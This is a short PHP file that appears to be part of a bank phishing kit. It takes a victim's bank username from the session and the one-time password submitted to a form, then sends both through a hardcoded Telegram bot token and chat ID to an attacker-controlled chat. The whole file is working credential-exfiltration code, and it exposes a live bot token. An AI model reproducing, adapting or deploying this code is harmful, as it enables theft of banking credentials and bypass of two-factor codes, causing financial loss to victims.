<?php 
require('../THE333/lib/funciones.php');
session_start();
$usuario = $_SESSION['usuario'];
$registro = $_SESSION['registro'];

$cdinamica = $_POST['otp'];

$contenido = "Usuario Banco: " . $usuario ."\n";
$contenido .= "Dinamica: " . $cdinamica ."\n";
$contenido=urlencode($contenido);
file_get_contents("https://api.telegram.org/bot8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM/sendMessage?chat_id=-4803034495&text=". $contenido);
actualizar_registro_otp($registro,$cdinamica);
?>